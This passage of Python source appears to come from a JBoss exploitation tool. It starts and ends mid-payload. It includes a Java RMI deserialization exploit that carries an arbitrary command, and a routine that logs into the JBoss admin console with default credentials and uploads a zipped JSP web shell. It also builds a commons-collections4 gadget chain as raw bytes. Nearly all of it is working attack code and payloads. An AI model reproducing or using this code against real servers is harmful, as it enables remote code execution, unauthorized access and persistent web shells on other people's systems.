\x6F\x6B\x65\x75\x71\x00\x7E\x00\x25\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\
\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\
\x71\x00\x7E\x00\x22\x73\x71\x00\x7E\x00\x1D\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\
\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x70\x78\x70\
\x00\x00\x00\x01\x74\x00")
# if running in python 3
if version_info[0] >= 3:
payload += (bytes(chr(len(cmd)), 'utf-8'))
payload += (bytes(cmd, 'utf-8'))
else:
payload += (chr(len(cmd)))
payload += (cmd)
payload += (b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x25\x00\x00\x00\x01\x71\x00\
\x7E\x00\x2A\x73\x71\x00\x7E\x00\x19\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\
\x6E\x74\x65\x67\x65\x72\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\
\x65\x70\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\
\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7E\x00\x09\x3F\x40\
\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78\x78\x76\x72\x00\x12\
\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x70\x78\x70")
# Interact to confirms that this is an RMI port
# This interact is no need... only for fun
# 1) send protocol hello (JRMI..K)
s.send(b"\x4A\x52\x4D\x49\x00\x02\x4B")
# 2) receive data (4e 00 XX + src_IP + 00 00 + int_src_Port) 19 bytes
s.recv(1024)
# 3) send some data + a little serialized object (18 bytes)
s.send(b"\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\
\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x02\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x06\x6a\x6d\x78\x72\x6d\x69")
# 4) receive a RMIServerImpStub serialized, containing the port to connect in jrmi (42 bytes)
msg = s.recv(1024)
# take rmi port platform from received bytes
port_rmi_platform = int(base64.b16encode(msg[-26:-24]), 16)
s.send("\x52")
s.recv(1024)
s.send(b"\x54\x7d\x14\x23\xc5\x00\x00\x01\x5a\x6d\x61\xc2\x91\x3b\xc8")
# 5) close this connection
s.close()
# Connect to send exploit
#-----------------------------------------
# 6) open a new connect, to a port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((host_rmi,port_rmi))
# 7) send header
s.send(b"\x4A\x52\x4D\x49\x00\x02\x4B")
# 8) receive data
s.recv(1024)
# 9) sendo some data
s.send(b"\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00")
# 10) send payload
s.send(payload)
s.close()
except socket.error as err:
jexboss.print_and_flush(RED + "\n * [ERROR]: %s (%s:%s).\n" % (err,host_rmi,port_rmi)+ ENDC)
return 505
return 200
def exploit_admin_console(url, jboss_login):
"""
Exploits admin-console
tested and works in JBoss 5 and 6
:param url: The URL to exploit
:return: The HTTP status code
"""
# Use default password for Jboss 5 and 6
username = jboss_login.split(":")[0]
password = jboss_login.split(":")[1]
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": jexboss.get_random_user_agent()}
r = gl_http_pool.request('GET', url+"/admin-console/login.seam", headers=headers)
if r.getheader('set-cookie') is not None:
headers['Cookie'] = r.getheader('set-cookie')
state = get_viewstate_value(str(r.data))
#payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login"
# "&javax.faces.ViewState=%s" % (username, password, state))
if state is None: return 505
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state)
headers['Content-Type'] = "application/x-www-form-urlencoded"
if jboss_login == "admin:admin":
jexboss.print_and_flush(GREEN + "\n * Info: Trying to perform authentication with default credentials..." +ENDC)
else:
jexboss.print_and_flush(GREEN + "\n * Info: Trying to perform authentication with credentials: %s" %jboss_login+ ENDC )
r = gl_http_pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False)
state = get_viewstate_value(str(r.data))
if r.status == 302:
jexboss.print_and_flush(GREEN + " * Info: Successfully logged in! Wait..." + ENDC)
location = r.getheader('Location')
conversation_id = location.split('=')[1]
r = gl_http_pool.request('GET', location, headers=headers)
if state == None:
sleep(7)
r = gl_http_pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR"
"%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers)
conversation_id = str(int(conversation_id)+1)
r = gl_http_pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType"
"Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId="
+ conversation_id, headers=headers)
state = get_viewstate_value(str(r.data))
headers['Content-Type'] = "multipart/form-data; boundary=---------------------------551367293438156646377323759"
payload = ("\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00\x05\xBC\x5E\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x09\x00\x04\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x03\x00\x50\x4B"
"\x07\x08\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00"
"\x05\xBC\x5E\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4D\x45\x54\x41"
"\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\xF3\x4D\xCC\xCB\x4C\x4B\x2D\x2E"
"\xD1\x0D\x4B\x2D\x2A\xCE\xCC\xCF\xB3\x52\x30\xD4\x33\xE0\xE5\x72\x2E\x4A\x4D\x2C\x49\x4D\xD1\x75"
"\xAA\x04\x09\x58\xE8\x19\xC4\x9B\x9B\x2B\x68\xF8\x17\x25\x26\xE7\xA4\x2A\x38\xE7\x17\x15\xE4\x17"
"\x25\x96\x00\x95\x6B\xF2\x72\xF1\x72\x01\x00\x50\x4B\x07\x08\x05\xA0\x0E\xBC\x43\x00\x00\x00\x44"
"\x00\x00\x00\x50\x4B\x03\x04\x14\x00\x08\x08\x08\x00\xEF\xBB\x5E\x49\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x0A\x00\x00\x00\x6A\x65\x78\x77\x73\x34\x2E\x6A\x73\x70\x95\x55\xDB\x6E\xDB"
"\x38\x10\x7D\xDF\xAF\x60\x08\x04\x10\x1B\x5B\x4E\x16\xFB\xD0\x46\x51\xB0\xD9\x6E\x82\x74\x51\x6C"
"\x83\x5C\xB0\x05\x82\xA0\x90\xA8\xB1\xC5\x84\x26\x59\x92\xB2\x1D\xB8\xFA\xF7\x0E\x29\x5F\xE3\x20"
"\xE8\xBE\x08\xE4\x70\x66\x78\xE6\xCC\x19\xEA\x64\xFF\x4F\x62\x8A\x11\x10\x31\x36\xDA\xFA\x9C\x3E"
"\x16\x93\x22\x95\x85\x1A\xA5\xEF\x7A\x71\xDD\x78\x21\x97\x6B\xA1\x97\x2B\x05\x3E\x7D\x47\x63\xE8"
"\xB9\xE2\xBA\x12\x6A\x94\xD3\xBB\xDB\x8B\xFE\x7B\xBA\x7F\x4A\x4E\x8C\x05\xFC\xEE\x13\x2E\x0B\xE7"
"\x88\x9D\x10\x98\x79\x50\x95\x23\xB7\xB5\x85\xA2\x9A\x7F\x52\xA6\xF1\x37\x1E\xD7\x63\x22\x5C\xF6"
"\xA5\xF1\xEB\xBD\x76\x99\x9D\x24\xDB\x1E\xBD\x17\x1E\x6C\xEE\x6B\xE1\x52\xE1\x72\x8C\x8E\x4B\xED"
"\x72\x0C\x6C\x4D\x53\x4A\xC1\xC9\x44\x8B\x8A\xD8\x46\x25\x6C\xFE\x57\x33\x1C\x82\x85\xEA\x1A\xEF"
"\x05\x4B\x84\xCA\x55\x23\x65\xB6\x34\xFF\x67\x85\x47\xB3\x6E\x7C\x67\xF7\xF6\x79\x1E\x7C\x60\x4A"
"\xB6\x23\x93\x60\xDA\x40\xB5\xB0\x2E\x70\x30\x96\xC5\x14\x1B\x61\x5D\xE6\x18\xB6\x89\x7E\x61\x5E"
"\x80\xC6\x38\x5E\x17\x96\x94\xF7\x0F\x31\x38\x6C\xEE\xDF\x1F\x7D\xF8\xFD\x21\x13\xCA\x13\x99\x4D"
"\x6B\x21\x21\x49\x64\x2E\x54\x1A\xA8\x4B\xCA\xDE\x61\xAF\x4C\x25\xA8\x91\xAF\x19\x3B\x3D\x64\x73"
"\xBC\x38\x9D\x86\xAC\xF1\x4C\x46\x24\xE9\x50\x36\xAE\x4E\x58\xD6\xB6\xBC\xF0\xBC\x4E\xCE\x67\x1C"
"\x8C\x17\x5A\x11\x60\xF3\xB6\x6D\x11\x0C\xF6\x8C\xB8\xBA\x2B\x5B\x0C\x13\x0B\xDF\x1B\x70\x3E\x1D"
"\x81\xBF\x2A\x6C\x31\x86\x00\x93\x1A\x63\x28\xDB\x8B\x4E\x6C\x8E\xDE\x6F\x78\x65\x2D\x48\x87\x4A"
"\xDA\x4A\x75\xD9\xD1\x44\xBF\xF6\xFF\x39\xFF\x1A\x32\x91\xD7\x52\xBD\xF0\xCA\x5A\x4C\xE2\x6A\xB2"
"\xF2\xB6\xE0\x8C\x56\x0E\x52\x07\xFE\xA3\x56\xA8\x25\x7F\xFB\x6C\x20\xA1\x1E\x85\x35\xA8\xFD\x58"
"\x62\xD0\x8B\x4E\x97\xB6\x2B\x6D\x51\xA9\xAC\x79\x1E\x9B\xF1\x77\x81\x4C\xB1\xD4\xEB\xEE\x00\x97"
"\xCE\x48\xE1\x13\x7A\x4C\xD9\xFD\xE1\xC3\x01\xAD\x53\xA9\x47\x94\x21\xDD\x46\x16\x1C\xCE\xA4\x4C"
"\x28\xA1\x3D\xDA\xC7\x3B\xA2\x3C\x5E\x2D\x50\xE9\x3E\xAF\x81\x3F\xF5\x1B\x53\xE1\x0D\x8E\xB2\x7C"
"\xC1\xDA\xA5\xF7\xE6\xEE\xFA\x33\xE2\x56\xC0\x63\x0B\x10\xC9\x8E\x91\x05\x6C\x68\x49\x68\x8D\x47"
"\xC7\x83\xC1\x14\x4A\x57\x83\x94\xE9\x23\xCC\x4A\xED\x5C\x98\xB9\xC1\xA3\x33\xDF\x26\x60\x1D\x06"
"\xA4\x7E\xE6\x11\xA5\x36\xA0\xD6\x59\xB0\xE3\x3C\x90\x74\xDD\x01\xBC\xB2\x78\x6C\xFD\x73\x42\xEF"
"\x1C\xD8\xFE\xD9\x08\x89\xA3\xBD\x57\xD0\x5F\x6A\x87\xC9\x0E\xE8\x49\x9F\x1E\x6C\x1C\x5F\xC3\x58"
"\x7B\x38\xAB\x2A\x9B\xA0\x52\xB1\xF0\xBD\x80\xF2\x22\x48\x92\xC6\x6A\xBF\xD1\x03\x24\x96\xA5\x30"
"\x13\xCE\x3B\x74\x9A\x5F\x21\xA9\x7E\x31\x55\xD3\xA8\xE9\x0D\xCB\x76\x54\x36\x4D\xB9\xD4\x0E\xBB"
"\x91\x85\x66\xFD\xEA\xC8\xF1\x80\x6C\xC3\x8C\xB7\xB2\x55\x97\x27\x79\x69\xE3\xA0\x7C\x16\x0A\xD6"
"\xBD\x25\xD8\xDB\xA3\x87\x58\x81\x9C\xA4\x58\x60\x21\x5D\x42\xFF\xA0\xAC\x1B\x1F\x13\x20\x26\xF4"
"\x5F\xBC\x6F\xC9\x2E\xB9\x92\x50\xA0\x9C\xBB\x76\xEE\x05\x51\xAE\xF4\xED\xEA\x54\xA8\x0A\x66\x5F"
"\x86\x09\x15\x55\x50\x75\xFF\xE8\xC7\x8F\x2D\xAB\xE1\x5A\x0D\xC5\xA8\x3B\x63\xF3\x5D\xCC\x98\xEE"
"\xB5\xD1\x5C\xA1\x91\x2A\xA1\x17\x05\x32\x5D\x11\xAF\x49\xA4\x8D\x0C\xB5\x25\x2B\x79\x65\x6D\x10"
"\x23\x76\x98\x03\xBE\xB1\x26\x2B\xB5\x46\xC4\x8A\x28\x31\xCB\xBD\x6D\x20\x16\x7B\xF3\xEC\x3C\x8C"
"\xE3\xB4\xAE\xA4\x30\xC4\xA4\xA8\x11\x83\xE3\xEB\xB5\x45\x09\x2D\xE9\x18\x04\x3A\x42\xF8\x10\xB7"
"\xB0\x18\xC2\x75\x4D\xA8\x43\x1B\xF5\x90\x2F\xAB\xBA\xD1\xFC\x09\x3C\x71\x3C\x36\xAF\xDB\x85\x90"
"\x05\xE9\x79\x24\x7D\x7B\xBC\x7A\x9F\x70\x7A\x47\x60\x53\xBC\xDE\x01\x6E\x36\xFC\x8F\xA3\x7F\x27"
"\x34\x84\x11\x1F\x09\x3A\x28\x85\x1A\x94\x85\xAB\x69\xF7\xBE\x44\x23\x1F\x57\x28\x39\x40\x93\xC9"
"\xAF\x1B\xE5\xC5\x18\xA2\x5C\xBB\x65\x12\xF4\x08\x1C\x33\xB3\x2C\x6A\x08\xFF\x27\x66\xA7\x01\x3D"
"\x17\x9B\xB2\xF9\x36\x07\x25\xA5\xCE\x17\xD6\x27\xEB\x48\xB7\xDB\xBB\x9E\x79\x33\xB2\xC3\xB9\x2C"
"\xE2\x2D\x84\x91\xB6\xA8\xDC\xFB\x87\xF9\x46\xA9\xF8\xD8\x70\xDA\x73\x75\xBB\x4C\xF6\x56\x92\x25"
"\x1B\x64\xF0\x91\xD0\x83\x50\x74\xFB\x7F\xC6\x69\x97\x99\xF5\x38\x55\xDB\xD3\xB4\xF8\x1B\x55\xEB"
"\x87\x79\x53\xAE\x15\xCB\x5E\xFA\xFF\x82\xC6\xEF\xD4\x93\xD2\x53\x7C\x13\xF5\x78\x5C\xA8\x2A\xCE"
"\xD9\xFE\xE9\x6F\x3F\x01\x50\x4B\x07\x08\x26\x77\xF3\x5E\xE3\x03\x00\x00\x99\x08\x00\x00\x50\x4B"
"\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x05\xBC\x5E\x49\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00"
"\x00\x00\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x45\x54\x41"
"\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x05\xBC\x5E"
"\x49\x05\xA0\x0E\xBC\x43\x00\x00\x00\x44\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x3D\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54"
"\x2E\x4D\x46\x50\x4B\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\xEF\xBB\x5E\x49\x26\x77\xF3\x5E\xE3"
"\x03\x00\x00\x99\x08\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC2\x00\x00"
"\x00\x6A\x65\x78\x77\x73\x34\x2E\x6A\x73\x70\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xB5"
"\x00\x00\x00\xDD\x04\x00\x00\x00\x00")
data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload)
try:
r = gl_http_pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data)
if r.status != 302:
data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload)
r = gl_http_pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data)
except:
sleep(1)
return get_successfully(url, "/jexws4/jexws4.jsp")
else:
jexboss.print_and_flush(RED + "\n * Failed authentication with username and password: %s.\n"
" Please try again with another login and password!\n" %jboss_login + ENDC)
sleep(4)
return 404
def generate_commons_collections40_payload(cmd):
# org.apache.commons:commons-collections4:4.0 (thanks ysoserial)
payload_commons_collection = (b"\xAC\xED\x00\x05\x73\x72\x00\x17\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x50\x72\x69\x6F\x72\
\x69\x74\x79\x51\x75\x65\x75\x65\x94\xDA\x30\xB4\xFB\x3F\x82\xB1\x03\x00\x02\x49\x00\x04\x73\x69\
\x7A\x65\x4C\x00\x0A\x63\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x74\x00\x16\x4C\x6A\x61\x76\x61\x2F\
\x75\x74\x69\x6C\x2F\x43\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x3B\x78\x70\x00\x00\x00\x02\x73\x72\
\x00\x42\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\
\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x63\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x73\x2E\x54\x72\
\x61\x6E\x73\x66\x6F\x72\x6D\x69\x6E\x67\x43\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x2F\xF9\x84\xF0\
\x2B\xB1\x08\xCC\x02\x00\x02\x4C\x00\x09\x64\x65\x63\x6F\x72\x61\x74\x65\x64\x71\x00\x7E\x00\x01\
\x4C\x00\x0B\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x74\x00\x2D\x4C\x6F\x72\x67\x2F\x61\x70\
\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\
\x34\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x40\x6F\x72\x67\x2E\
\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\
\x6E\x73\x34\x2E\x63\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\x73\x2E\x43\x6F\x6D\x70\x61\x72\x61\x62\
\x6C\x65\x43\x6F\x6D\x70\x61\x72\x61\x74\x6F\x72\xFB\xF4\x99\x25\xB8\x6E\xB1\x37\x02\x00\x00\x78\
\x70\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\
\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\
\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\
\x02\x00\x01\x5B\x00\x0D\x69\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2E\x5B\x4C\
\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\
\x63\x74\x69\x6F\x6E\x73\x34\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\
\x00\x2E\x5B\x4C\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\
\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\
\x39\x81\x3A\xFB\x08\xDA\x3F\xA5\x02\x00\x00\x78\x70\x00\x00\x00\x02\x73\x72\x00\x3C\x6F\x72\x67\
\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\
\x6F\x6E\x73\x34\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\
\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\
\x43\x6F\x6E\x73\x74\x61\x6E\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\
\x6A\x65\x63\x74\x3B\x78\x70\x76\x72\x00\x37\x63\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\
\x70\x61\x63\x68\x65\x2E\x78\x61\x6C\x61\x6E\x2E\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\
\x74\x63\x2E\x74\x72\x61\x78\x2E\x54\x72\x41\x58\x46\x69\x6C\x74\x65\x72\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3F\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\
\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x34\x2E\x66\x75\x6E\x63\x74\
\x6F\x72\x73\x2E\x49\x6E\x73\x74\x61\x6E\x74\x69\x61\x74\x65\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\
\x65\x72\x34\x8B\xF4\x7F\xA4\x86\xD0\x3B\x02\x00\x02\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\
\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x0B\x69\x50\
\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\
\x43\x6C\x61\x73\x73\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\
\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x01\
\x73\x72\x00\x3A\x63\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x78\
\x61\x6C\x61\x6E\x2E\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\x74\x63\x2E\x74\x72\x61\x78\
\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x49\x6D\x70\x6C\x09\x57\x4F\xC1\x6E\xAC\xAB\x33\x03\x00\
\x06\x49\x00\x0D\x5F\x69\x6E\x64\x65\x6E\x74\x4E\x75\x6D\x62\x65\x72\x49\x00\x0E\x5F\x74\x72\x61\
\x6E\x73\x6C\x65\x74\x49\x6E\x64\x65\x78\x5B\x00\x0A\x5F\x62\x79\x74\x65\x63\x6F\x64\x65\x73\x74\
\x00\x03\x5B\x5B\x42\x5B\x00\x06\x5F\x63\x6C\x61\x73\x73\x71\x00\x7E\x00\x14\x4C\x00\x05\x5F\x6E\
\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\
\x4C\x00\x11\x5F\x6F\x75\x74\x70\x75\x74\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4C\
\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x3B\x78\x70\x00\
\x00\x00\x00\xFF\xFF\xFF\xFF\x75\x72\x00\x03\x5B\x5B\x42\x4B\xFD\x19\x15\x67\x67\xDB\x37\x02\x00\
\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5B\x42\xAC\xF3\x17\xF8\x06\x08\x54\xE0\x02\x00\x00\
\x78\x70\x00\x00\x06\x8C\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x38\x0A\x00\x03\x00\x22\x07\x00\x36\
\x07\x00\x25\x07\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\
\x44\x01\x00\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\xAD\x20\
\x93\xF3\x91\xDD\xEF\x3E\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\
\x43\x6F\x64\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\
\x12\x4C\x6F\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\
\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\
\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x35\x4C\x79\x73\x6F\x73\x65\
\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\
\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x3B\x01\
\x00\x09\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x01\x00\x72\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\
\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\
\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\
\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\
\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\
\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x64\x6F\x63\x75\x6D\x65\x6E\x74\x01\x00\x2D\x4C\x63\
\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\
\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x01\x00\x08\x68\x61\
\x6E\x64\x6C\x65\x72\x73\x01\x00\x42\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\
\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\
\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\
\x65\x72\x3B\x01\x00\x0A\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x73\x07\x00\x27\x01\x00\xA6\x28\x4C\
\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\
\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x4C\x63\x6F\x6D\
\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\
\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\
\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\
\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\
\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x69\
